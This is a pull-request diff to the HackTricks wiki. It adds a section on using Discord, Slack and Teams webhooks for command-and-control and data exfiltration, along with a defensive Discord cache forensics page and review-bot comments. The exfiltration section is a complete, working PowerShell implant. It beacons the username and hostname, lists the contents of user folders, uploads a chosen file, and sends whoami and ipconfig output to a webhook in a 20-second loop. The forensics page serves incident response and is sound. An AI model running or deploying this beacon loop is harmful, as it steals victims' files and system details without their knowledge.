	Merge pull request #1410 from HackTricks-wiki/update_Discord_as_a_C2_and_the_cached_evidence_left_behin_20250916_125230
Discord as a C2 and the cached evidence left behind
This commit is contained in:
		
						commit
						bacfd40952
					
				| @ -59,6 +59,7 @@ | ||||
|     - [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) | ||||
|     - [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md) | ||||
|     - [Deofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md) | ||||
|     - [Discord Cache Forensics](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md) | ||||
|     - [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md) | ||||
|     - [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md) | ||||
|     - [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md) | ||||
|  | ||||
| @ -112,6 +112,93 @@ if __name__ == "__main__": | ||||
| ### | ||||
| ``` | ||||
| 
 | ||||
| ## Webhooks (Discord/Slack/Teams) for C2 & Data Exfiltration | ||||
| 
 | ||||
| Webhooks are write-only HTTPS endpoints that accept JSON and optional file parts. They’re commonly allowed to trusted SaaS domains and require no OAuth/API keys, making them useful for low-friction beaconing and exfiltration. | ||||
| 
 | ||||
| Key ideas: | ||||
| - Endpoint: Discord uses https://discord.com/api/webhooks/<id>/<token> | ||||
| - POST multipart/form-data with a part named payload_json containing {"content":"..."} and optional file part(s) named file. | ||||
| - Operator loop pattern: periodic beacon -> directory recon -> targeted file exfil -> recon dump -> sleep. HTTP 204 NoContent/200 OK confirm delivery. | ||||
| 
 | ||||
| PowerShell PoC (Discord): | ||||
| 
 | ||||
| ```powershell | ||||
| # 1) Configure webhook and optional target file | ||||
| $webhook = "https://discord.com/api/webhooks/YOUR_WEBHOOK_HERE" | ||||
| $target  = Join-Path $env:USERPROFILE "Documents\SENSITIVE_FILE.bin" | ||||
| 
 | ||||
| # 2) Reuse a single HttpClient | ||||
| $client = [System.Net.Http.HttpClient]::new() | ||||
| 
 | ||||
| function Send-DiscordText { | ||||
|     param([string]$Text) | ||||
|     $payload = @{ content = $Text } | ConvertTo-Json -Compress | ||||
|     $jsonContent = New-Object System.Net.Http.StringContent($payload, [System.Text.Encoding]::UTF8, "application/json") | ||||
|     $mp = New-Object System.Net.Http.MultipartFormDataContent | ||||
|     $mp.Add($jsonContent, "payload_json") | ||||
|     $resp = $client.PostAsync($webhook, $mp).Result | ||||
|     Write-Host "[Discord] text -> $($resp.StatusCode)" | ||||
| } | ||||
| 
 | ||||
| function Send-DiscordFile { | ||||
|     param([string]$Path, [string]$Name) | ||||
|     if (-not (Test-Path $Path)) { return } | ||||
|     $bytes = [System.IO.File]::ReadAllBytes($Path) | ||||
|     $fileContent = New-Object System.Net.Http.ByteArrayContent(,$bytes) | ||||
|     $fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("application/octet-stream") | ||||
|     $json = @{ content = ":package: file exfil: $Name" } | ConvertTo-Json -Compress | ||||
|     $jsonContent = New-Object System.Net.Http.StringContent($json, [System.Text.Encoding]::UTF8, "application/json") | ||||
|     $mp = New-Object System.Net.Http.MultipartFormDataContent | ||||
|     $mp.Add($jsonContent, "payload_json") | ||||
|     $mp.Add($fileContent, "file", $Name) | ||||
|     $resp = $client.PostAsync($webhook, $mp).Result | ||||
|     Write-Host "[Discord] file $Name -> $($resp.StatusCode)" | ||||
| } | ||||
| 
 | ||||
| # 3) Beacon/recon/exfil loop | ||||
| $ctr = 0 | ||||
| while ($true) { | ||||
|     $ctr++ | ||||
|     # Beacon | ||||
|     $beacon = "━━━━━━━━━━━━━━━━━━`n:satellite: Beacon`n```User: $env:USERNAME`nHost: $env:COMPUTERNAME```" | ||||
|     Send-DiscordText -Text $beacon | ||||
| 
 | ||||
|     # Every 2nd: quick folder listing | ||||
|     if ($ctr % 2 -eq 0) { | ||||
|         $dirs = @("Documents","Desktop","Downloads","Pictures") | ||||
|         $acc = foreach ($d in $dirs) { | ||||
|             $p = Join-Path $env:USERPROFILE $d | ||||
|             $items = Get-ChildItem -Path $p -ErrorAction SilentlyContinue | Select-Object -First 3 -ExpandProperty Name | ||||
|             if ($items) { "`n$d:`n - " + ($items -join "`n - ") } | ||||
|         } | ||||
|         Send-DiscordText -Text (":file_folder: **User Dirs**`n━━━━━━━━━━━━━━━━━━`n```" + ($acc -join "") + "```") | ||||
|     } | ||||
| 
 | ||||
|     # Every 3rd: targeted exfil | ||||
|     if ($ctr % 3 -eq 0) { Send-DiscordFile -Path $target -Name ([IO.Path]::GetFileName($target)) } | ||||
| 
 | ||||
|     # Every 4th: basic recon | ||||
|     if ($ctr % 4 -eq 0) { | ||||
|         $who = whoami | ||||
|         $ip  = ipconfig | Out-String | ||||
|         $tmp = Join-Path $env:TEMP "recon.txt" | ||||
|         "whoami:: $who`r`nIPConfig::`r`n$ip" | Out-File -FilePath $tmp -Encoding utf8 | ||||
|         Send-DiscordFile -Path $tmp -Name "recon.txt" | ||||
|     } | ||||
| 
 | ||||
|     Start-Sleep -Seconds 20 | ||||
| } | ||||
| ``` | ||||
| 
 | ||||
| Notes: | ||||
| - Similar patterns apply to other collaboration platforms (Slack/Teams) using their incoming webhooks; adjust URL and JSON schema accordingly. | ||||
| - For DFIR of Discord Desktop cache artifacts and webhook/API recovery, see: | ||||
| 
 | ||||
| {{#ref}} | ||||
| ../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| ## FTP | ||||
| 
 | ||||
| ### FTP server (python) | ||||
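Review bot: The `Notes:` list closing the new Webhooks section leaves the defender with nothing actionable, although the PoC above fixes the observables: every 20 s it POSTs `multipart/form-data` with a `payload_json` part to `https://discord.com/api/webhooks/<id>/<token>`, the beacon embeds `$env:USERNAME`/`$env:COMPUTERNAME`, and the recon branch writes `recon.txt` under `$env:TEMP` before uploading it. Suggest a third bullet such as `- Detection/mitigation: egress or proxy logs of POSTs to discord.com/api/webhooks/ (fixed 20 s cadence in this PoC) and a leftover %TEMP%\recon.txt on the host; restrict webhook-hosting SaaS domains where the business does not use them.` This keeps the section symmetrical with the DFIR page it already links to.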
| @ -364,7 +451,10 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be | ||||
| 
 | ||||
| - [https://github.com/Stratiz/DNS-Exfil](https://github.com/Stratiz/DNS-Exfil) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/) | ||||
| - [Discord Webhooks – Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook) | ||||
| - [Discord Forensic Suite (cache parser)](https://github.com/jwdfir/discord_cache_parser) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| @ -80,6 +80,12 @@ Within these directories, most user data can be found in the **Default/** or **C | ||||
| - **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads. | ||||
| - **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available. | ||||
| - **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html). | ||||
| 
 | ||||
|   Electron-based desktop apps (e.g., Discord) also use Chromium Simple Cache and leave rich on-disk artifacts. See: | ||||
| 
 | ||||
|   {{#ref}} | ||||
|   discord-cache-forensics.md | ||||
|   {{#endref}} | ||||
| - **Bookmarks**: User bookmarks. | ||||
| - **Web Data**: Contains form history. | ||||
| - **Favicons**: Stores website favicons. | ||||
|  | ||||
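--- /dev/null
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md
@@ -0,0 +1,91 @@
+# Discord Cache Forensics (Chromium Simple Cache)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+This page summarizes how to triage Discord Desktop cache artifacts to recover exfiltrated files, webhook endpoints, and activity timelines. Discord Desktop is an Electron/Chromium app and uses Chromium Simple Cache on disk.
+
+## Where to look (Windows/macOS/Linux)
+
+- Windows: %AppData%\discord\Cache\Cache_Data
+- macOS: ~/Library/Application Support/discord/Cache/Cache_Data
+- Linux: ~/.config/discord/Cache/Cache_Data
+
+Key on‑disk structures inside Cache_Data:
+- index: Simple Cache index database
+- data_#: Binary cache block files that can contain multiple cached objects
+- f_######: Individual cached entries stored as standalone files (often larger bodies)
+
+Note: Deleting messages/channels/servers in Discord does not purge this local cache. Cached items often remain and their file timestamps align with user activity, enabling timeline reconstruction.
+
+## What can be recovered
+
+- Exfiltrated attachments and thumbnails fetched via cdn.discordapp.com/media.discordapp.net
+- Images, GIFs, videos (e.g., .jpg, .png, .gif, .webp, .mp4, .webm)
+- Webhook URLs (https://discord.com/api/webhooks/…)
+- Discord API calls (https://discord.com/api/vX/…)
+- Helpful for correlating beaconing/exfil activity and hashing media for intel matching
+
+## Quick triage (manual)
+
+- Grep cache for high-signal artifacts:
+  - Webhook endpoints:
+    - Windows: findstr /S /I /C:"https://discord.com/api/webhooks/" "%AppData%\discord\Cache\Cache_Data\*"
+    - Linux/macOS: strings -a Cache_Data/* | grep -i "https://discord.com/api/webhooks/"
+  - Attachment/CDN URLs:
+    - strings -a Cache_Data/* | grep -Ei "https://(cdn|media)\.discord(app)?\.com/attachments/"
+  - Discord API calls:
+    - strings -a Cache_Data/* | grep -Ei "https://discord(app)?\.com/api/v[0-9]+/"
+- Sort cached entries by modified time to build a quick timeline (mtime reflects when the object hit cache):
+  - Windows PowerShell: Get-ChildItem "$env:AppData\discord\Cache\Cache_Data" -File -Recurse | Sort-Object LastWriteTime | Select-Object LastWriteTime, FullName
+
+## Parsing f_* entries (HTTP body + headers)
+
+Files starting with f_ contain HTTP response headers followed by the body. The header block typically ends with \r\n\r\n. Useful response headers include:
+- Content-Type: To infer media type
+- Content-Location or X-Original-URL: Original remote URL for preview/correlation
+- Content-Encoding: May be gzip/deflate/br (Brotli)
+
+Media can be extracted by splitting headers from body and optionally decompressing based on Content-Encoding. Magic-byte sniffing is useful when Content-Type is absent.
+
+## Automated DFIR: Discord Forensic Suite (CLI/GUI)
+
+- Repo: https://github.com/jwdfir/discord_cache_parser
+- Function: Recursively scans Discord’s cache folder, finds webhook/API/attachment URLs, parses f_* bodies, optionally carves media, and outputs HTML + CSV timeline reports with SHA‑256 hashes.
+
+Example CLI usage:
+
+```bash
+# Acquire cache (copy directory for offline parsing), then run:
+python3 discord_forensic_suite_cli \
+  --cache "%AppData%\discord\Cache\Cache_Data" \
+  --outdir C:\IR\discord-cache \
+  --output discord_cache_report \
+  --format both \
+  --timeline \
+  --extra \
+  --carve \
+  --verbose
+```
+
+Key options:
+- --cache: Path to Cache_Data
+- --format html|csv|both
+- --timeline: Emit ordered CSV timeline (by modified time)
+- --extra: Also scan sibling Code Cache and GPUCache
+- --carve: Carve media from raw bytes near regex hits (images/video)
+- Output: HTML report, CSV report, CSV timeline, and a media folder with carved/extracted files
+
+## Analyst tips
+
+- Correlate the modified time (mtime) of f_* and data_* files with user/attacker activity windows to reconstruct a timeline.
+- Hash recovered media (SHA-256) and compare against known-bad or exfil datasets.
+- Extracted webhook URLs can be tested for liveness or rotated; consider adding them to blocklists and retro-hunting proxies.
+- Cache persists after “wiping” on the server side. If acquisition is possible, collect the entire Cache directory and related sibling caches (Code Cache, GPUCache).
+
+## References
+
+- [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/)
+- [Discord Forensic Suite (CLI/GUI)](https://github.com/jwdfir/discord_cache_parser)
+- [Discord Webhooks – Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook)
+
+{{#include ../../../banners/hacktricks-training.md}}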
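Review bot: The CLI example under `Example CLI usage:` does not run in any single shell as written: `%AppData%` is cmd.exe expansion while the trailing backslashes are bash line continuations inside a fence tagged `bash`; in PowerShell write `--cache "$env:APPDATA\discord\Cache\Cache_Data"` and join the lines (or use backtick continuations), matching the `$env:AppData` form the Quick triage section already uses. The acquisition comment `# Acquire cache (copy directory for offline parsing), then run:` should also tell the reader to copy in a timestamp-preserving way or record mtimes first, because both the Quick triage and Analyst tips sections build the timeline from mtime, which a plain copy rewrites. Lastly, the Analyst tips bullet `Extracted webhook URLs can be tested for liveness or rotated` needs a caveat that executing the webhook posts a message into the adversary's channel and alerts them; a non-posting check (a GET on the webhook URL, which the Discord API answers with the webhook object) or reporting the webhook to Discord for takedown is the quieter option.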